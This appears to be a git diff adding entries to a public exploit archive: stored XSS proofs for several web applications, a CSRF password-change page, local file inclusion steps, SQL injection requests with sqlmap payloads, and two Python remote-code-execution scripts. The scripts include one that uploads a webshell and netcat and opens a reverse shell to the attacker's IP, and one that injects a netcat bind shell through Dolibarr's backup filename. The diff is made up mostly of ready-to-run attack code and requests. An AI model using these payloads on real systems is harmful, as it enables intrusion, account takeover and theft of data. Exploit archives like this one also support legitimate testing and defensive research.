+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49209.txt b/exploits/php/webapps/49209.txt
index 06ea8299c..ed29dab88 100644
--- a/exploits/php/webapps/49209.txt
+++ b/exploits/php/webapps/49209.txt
@@ -5,6 +5,7 @@
 # Tested on: Windows 10
 # Web Browser: Mozilla Firefox & Opera
 # Google Dorks: "Powered by vBulletin® Version 5.6.3"
+# Blog: https://pentestvincent.blogspot.com/2020/11/vbulletin-563-admin-cp-multiple.html
 
 Go to the "Admin CP" - click on "Styles" - click "Style Manager" -
 Choose "Denim" or other theme and choose action "Add new template" and
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/49258.txt b/exploits/php/webapps/49258.txt
new file mode 100644
index 000000000..e61a6f1c1
--- /dev/null
+++ b/exploits/php/webapps/49258.txt
@@ -0,0 +1,26 @@
+# Exploit Title: Task Management System 1.0 - 'page' Local File Inclusion
+# Exploit Author: İsmail BOZKURT
+# Date: 2020-12-15
+# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: Windows 10 x86_64
+
+Step 1. Log into application with credentials
+Step 2. Click on Branch
+Step 3. Select New Branch http://127.0.0.1/index.php?page=index
+Step 4. change index to ../../../c:/xampp/apache/bin/php.ini%00
+
+Note: php version < 5.3.3
+
+section class="content">
+    <div class="container-fluid">
+    <?php 
+    	$page = isset($_GET['page']) ? $_GET['page'] : 'home';
+	    if(!file_exists($page.".php")){
+	    include '404.html';
+	    }else{
+	    include $page.'.php';
+    }
+    ?>
\ No newline at end of file
diff --git a/exploits/php/webapps/49260.py b/exploits/php/webapps/49260.py
new file mode 100755
index 000000000..1d2d8b55c
--- /dev/null
+++ b/exploits/php/webapps/49260.py
@@ -0,0 +1,128 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-14-12
+# Exploit Author: Andrea Bruschi - www.andreabruschi.net
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10 / Xampp Server and Wamp Server
+
+#!/usr/bin/python3
+
+import requests
+import sys
+import os
+import iterm2
+import AppKit
+
+url = sys.argv[1]
+mobile = sys.argv[2]
+password = sys.argv[3] 
+
+# CONFIGURE HERE
+reverse_ip = '192.168.xx.xx'
+reverse_port = 4444
+
+# CONFIGURE HERE
+# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
+netcat_path = '/local/path/to/nc.exe'
+shell_path = '/local/path/to/shell.php'
+
+
+def login(url, mobile, password):
+
+    url = "{}/user/login.php".format(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    cookie = req.cookies['PHPSESSID']
+    
+    return cookie
+
+
+def upload(url, cookie, file=None):
+
+    f = open(file, 'rb')
+    filename, ext = os.path.splitext(file)
+
+    if "exe" in ext:
+        content_type = 'application/octet-stream'
+    else:
+        content_type = 'application/x-php'
+
+    cookie = {'PHPSESSID':cookie}
+    url = "{}/user/marriage-reg-form.php".format(url)
+
+    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
+    req = requests.post(url, data=payload, cookies=cookie, files=files)
+    print(f'[+] File {ext} uploaded')
+
+
+def get_remote_file(url, ext):
+
+    url = "{}/user/images".format(url)
+    req = requests.get(url)
+    junk = req.text.split(ext)[0]
+    f = junk[-42:] + ext
+    
+    return f
+
+
+def persistence(url, webshell, netcat):
+
+    # webshell
+    payload_w = "copy /y {} shell.php".format(webshell)
+    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
+    req_w = requests.get(url_w)
+    
+    # netcat
+    payload_n = "copy /y {} nc.exe".format(netcat)
+    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
+    req_n= requests.get(url_n)
+
+    print('[+] Persistence enabled')
+
+
+def get_reverse(url, ip, port):
+
+    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
+    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
+    print('[+] Reverse shell incoming!')
+    req = requests.get(url_r)
+
+
+# CONFIGURE HERE
+# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
+# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
+def start_listener(port):
+    
+    # Launch the app
+    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")
+
+    async def main(connection):
+        app = await iterm2.async_get_app(connection)
+        window = app.current_window
+        if window is not None:
+            cmd = "nc -lnv {}".format(port)
+            await window.async_create_tab(command=cmd)
+        else:
+            print("No current window")
+
+    iterm2.run_until_complete(main)
+
+
+
+if __name__ == "__main__":
+
+    if len(sys.argv < 3): 
+        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
+    else:
+        cookie = login(url, mobile, password)
+        upload(url, cookie, netcat_path)
+        upload(url, cookie, shell_path)
+        webshell = get_remote_file(url, '.php')
+        netcat = get_remote_file(url, '.exe')
+        persistence(url, webshell, netcat)
+        
+        start_listener(reverse_port)
+        get_reverse(url, reverse_ip, reverse_port)
\ No newline at end of file
diff --git a/exploits/php/webapps/49264.txt b/exploits/php/webapps/49264.txt
new file mode 100644
index 000000000..1fdab4c98
--- /dev/null
+++ b/exploits/php/webapps/49264.txt
@@ -0,0 +1,45 @@
+# Exploit Title: Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting
+# Date: 13-12-2020
+# Exploit Author: Sagar Banwa
+# Vendor Homepage: https://getgrav.org/
+# Software Link: https://getgrav.org/downloads
+# Version: Grav v1.6.30 - Admin v1.9.18
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/sagarbanwa/
+
+Step to reproduce :
+
+1) log in to the grav-admin panel 
+2) Go to Pages 
+3) Click on Add 
+4) It will ask to Add Page
+5) fill the following details as below 
+   Page Title : <script>alert(1337)</script>
+   Folder Name : sagar_Banwa
+   Parent Page : /(root)
+   Page Template : Default
+   Value : yes
+6) click on the Save button 
+7) now Click on Pages again.
+8) your page name will be listed as <script>alert(1337)</script>
+9) Now click on the eye button to see the XSS or you can simply go to http://127.0.0.1/grav-admin/ the XSS will pop-up 
+
+-------------------------------------
+   
+POST /grav-admin/admin/pages HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 230
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/grav-admin/admin/pages
+Cookie: grav-site-a4a23f1-admin=ehrcji8qpnu8e50r839r4oe2on; grav-site-a4a23f1=u5438b49fft2b5d7610a53ne1d; grav-tabs-state={%22tab-options.routes.registration.Security%22:%22data.Security%22%2C%22tab-content.options.advanced%22:%22data.content%22}
+Upgrade-Insecure-Requests: 1
+
+data%5Btitle%5D=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&data%5Bfolder%5D=sagar_banwa&data%5Broute%5D=%2F&data%5Bname%5D=default&data%5Bvisible%5D=1&data%5Bblueprint%5D=&task=continue&admin-nonce=d488c0d8bdaf2978d50f174942d5279f
+
+-----------------------------
\ No newline at end of file
diff --git a/exploits/php/webapps/49267.txt b/exploits/php/webapps/49267.txt
new file mode 100644
index 000000000..afbecfd5e
--- /dev/null
+++ b/exploits/php/webapps/49267.txt
@@ -0,0 +1,14 @@
+​# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
+# Date: 2020-12-15
+# Exploit Author: Frederic ADAM
+# Author contact: contact@fadam.eu
+# Vendor Homepage: https://www.prestashop.com
+# Software Link: https://github.com/PrestaShop/productcomments
+# Version: 4.2.0
+# Tested on: Debian 10
+# CVE : CVE-2020-26248
+
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=[SQL]
+
+Example:
+http://localhost/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(2)))a)
\ No newline at end of file
diff --git a/exploits/php/webapps/49268.txt b/exploits/php/webapps/49268.txt
new file mode 100644
index 000000000..8d1d21095
--- /dev/null
+++ b/exploits/php/webapps/49268.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Seotoaster 3.2.0 - Stored XSS on Edit page properties
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.seotoaster.com/
+# Software Link: https://crm-marketing-automation-platforms.seotoaster.com/
+# Version: 3.2.0
+# Tested on Windows 10
+
+XSS ATTACK:
+Cross-site Scripting (XSS) is a client-side code injection attack. The
+attacker aims to execute malicious scripts in a web browser of the victim
+by including malicious code in a legitimate web page or web application.
+The actual attack occurs when the victim visits the web page or web
+application that executes the malicious code. The web page or web
+application becomes a vehicle to deliver the malicious script to the user’s
+browser. Vulnerable vehicles that are commonly used for Cross-site
+Scripting attacks are forums, message boards, and web pages that allow
+comments.
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit page properties
+
+Steps to reproduce:
+1: Navigate to "https://localhost/" and log in with valid credentials.
+2: Then navigates/click on "Edit page properties".
+3: Add the payload "*"><script>alert(document.cookie)</script>*", on "Page header H1 tag" field and click on "Save Page" button. Page Saved succesfully.
+4: Hence XSS will get stored and trigger on the main home/main page.
\ No newline at end of file
diff --git a/exploits/php/webapps/49269.py b/exploits/php/webapps/49269.py
new file mode 100755
index 000000000..41e8c2dff
--- /dev/null
+++ b/exploits/php/webapps/49269.py
@@ -0,0 +1,77 @@
+# Exploit Title: Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
+# Date: 2020.12.17
+# Exploit Author: Yilmaz Degirmenci
+# Vendor Homepage: https://github.com/Dolibarr/dolibarr
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 12.0.3
+# Tested on: Kali Linux 2020.2
+
+# Vulnerability Description: Open source ERP-CRM Dolibarr 12.0.3 is
+# vulnerable to authenticated Remote Code Execution Attack. An attacker who
+# has the access the admin dashboard can manipulate the backup function by
+# inserting payload into the zipfilename_template parameter at page
+# /admin/tools/dolibarr_export.php by clicking on the button "Generate
+# Backup" thus triggering command injection on target system.
+
+import requests
+from bs4 import BeautifulSoup
+from bs4 import Comment
+import re
+import lxml
+import json
+import urllib
+
+username = input("username: ")
+password = input("password: ")
+root_url = input("Root URL: http://192.168.0.15/ --> ")
+
+print("Exploit is sent! Check out if the bind shell on port 9999 active!")
+
+listener_port = "9999"
+
+login_url = root_url + "/index.php?mainmenu=home "
+vulnerable_url = root_url + "/admin/tools/dolibarr_export.php"
+upload_url = root_url + "/admin/tools/export_files.php"
+
+session = requests.Session()
+request = session.get(login_url)
+
+# Get the token value
+soup = BeautifulSoup(request.text,"lxml")
+token = soup.find("input",{'name':'token'})['value']
+
+# Login
+body = {"token":token, "actionlogin":"login",
+"loginfunction":"loginfunction", "tz":"-5",
+"tz_string":"America%2FNew_York", "dst_observed":"1",
+"dst_first":"2020-03-8T01%3A59%3A00Z", "dst_second":
+"2020-11-1T01%3A59%3A00Z", "screenwidth":"1668", "screenheight":"664",
+"dol_hide_topmenu":"", "dol_hide_leftmenu":"",
+"dol_optimize_smallscreen":"", "dol_no_mouse_hover":"",
+"dol_use_jmobile":"", "username":username,"password":password}
+
+session.post(login_url, data=body, cookies=request.cookies)
+
+request = session.get(vulnerable_url)
+token = soup.find("input",{'name':'token'})['value']
+
+header = {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)
+Gecko/20100101 Firefox/80.0",
+"Accept":"*/",
+"Accept-Encoding": "gzip, deflate",
+"Origin": root_url,
+"Referer":
+root_url+"/admin/tools/dolibarr_export.php?mainmenu=home&leftmenu=admintools",
+"Upgrade-Insecure-Requests": "1"
+}
+
+body = {"token":token, "export_type":"server", "page_y":"1039",
+"zipfilename_template":"documents_dolibarr_12.0.3_202012160422.tar
+--use-compress-program='nc -c bash -nlvp  9999' %0a  :: ",
+"compression":"gz"}
+
+param = urllib.parse.urlencode(body, quote_via=urllib.parse.quote)
+
+session.post(upload_url, data=body, params=param, cookies=request.cookies, headers=header)
\ No newline at end of file
diff --git a/exploits/php/webapps/49271.txt b/exploits/php/webapps/49271.txt
new file mode 100644
index 000000000..8a1238606
--- /dev/null
+++ b/exploits/php/webapps/49271.txt
@@ -0,0 +1,14 @@
+# Exploit Title:Content Management System 1.0 - 'First Name' Stored XSS
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Tested on: WINDOWS 10
+
+Step 1: Log in to the CMS with any valid user credentials.
+Step 2: Click on the logged in username on header and select Manage Account.
+Step 3: Rename the user First Name to
+"<script>alert(document.domain)</script>".
+Step 4: Update Profile and this will trigger the XSS.
+Step 5: Logout and login again and the page will display the domain name.
\ No newline at end of file
diff --git a/exploits/php/webapps/49272.txt b/exploits/php/webapps/49272.txt
new file mode 100644
index 000000000..0d737b0ed
--- /dev/null
+++ b/exploits/php/webapps/49272.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Content Management System 1.0 - 'email' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "http://127.0.0.1/ajax.php?action=login"
+page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=login HTTP/1.1
+Host: 10.211.55.4
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 61
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://10.211.55.4
+Referer: http://10.211.55.4/login.php
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+email=admin%40admin.com%27and%27p%27%3D%27p&password=admin123
+---
+
+SQLMAP
+---
+Parameter: email (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: email=admin@admin.com'and'p'='p' AND 9108=9108 AND
+'WlxU'='WlxU&password=admin123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: email=admin@admin.com'and'p'='p' AND (SELECT 3864 FROM
+(SELECT(SLEEP(5)))pNJR) AND 'hxyZ'='hxyZ&password=admin123
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49273.txt b/exploits/php/webapps/49273.txt
new file mode 100644
index 000000000..db43ac797
--- /dev/null
+++ b/exploits/php/webapps/49273.txt
@@ -0,0 +1,58 @@
+# Exploit Title: Content Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Zhayi (Zeo)
+# Date: 2020-12-14
+# Vendor Homepage: https://www.sourcecodester.com/php/14625/content-management-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14625&title=Content+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Affected Version: Version 1
+# Category: Web Application
+# Tested on: WINDOWS 10
+
+Step 1. Capture the request of the "
+http://127.0.0.1/ajax.php?action=load_list" page in burpsute
+Step 2. Save POST the packet
+Step 3. Run sqlmap on request file using command "python3 sqlmap.py -r
+request.txt --random-agent --batch --dbms "mysql" --time-sec=5 --no-cast
+--dbs "
+Step 4. This will inject successfully and you will have an information
+disclosure of all databases contents
+
+POST the packet
+---
+POST /ajax.php?action=load_list HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101
+Firefox/78.0
+Content-Length: 63
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: PHPSESSID=ltiafgjrnml0d8kqe58gcsk1v3
+Origin: http://127.0.0.1
+Referer:
+http://127.0.0.1/index.php?page=list&c=sub_navigation_1&cid=eccbc87e4b5ce2fe28308fd9f2a7baf3
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+id=eccbc87e4b5ce2fe28308fd9f2a7baf3%27and%27u%27%3D%27u&start=0
+---
+
+SQLMAP
+---
+Parameter: id (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND 9689=9689
+AND 'ZPQO'='ZPQO&start=0
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' AND (SELECT
+6418 FROM (SELECT(SLEEP(5)))ROIx) AND 'XaBw'='XaBw&start=0
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 10 columns
+    Payload: id=eccbc87e4b5ce2fe28308fd9f2a7baf3'and'u'='u' UNION ALL
+SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x7171716a71,0x5559707346467277634166536c6e786168576872504f746f7a5a4c52624d4c495742566651725242,0x7170627171),NULL,NULL,NULL,NULL,NULL--
+-&start=0
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/49274.txt b/exploits/php/webapps/49274.txt
new file mode 100644
index 000000000..d62a45ec6
--- /dev/null
+++ b/exploits/php/webapps/49274.txt
@@ -0,0 +1,52 @@
+# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
+# Date: 2020-12-10
+# Google Dork: N/A
+# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
+# Affected Version: Version 1
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Parrot OS
+
+Step 1. Login to the application with any verified user credentials
+
+Step 2. Select Staff and select the view icon.
+
+Step 3. You will be redirected to a page like "
+http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any
+page that has the "id" parameter. Capture the current page request in
+burpsuite
+
+Step 4. Save request and run sqlmap on request file using command " sqlmap
+-r request -p id --time-sec=5 --dbs ".
+
+Step 5. This will inject successfully and you will have an information
+disclosure of all databases contents.
+
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: Boolean-based blind - Parameter replace (original value)
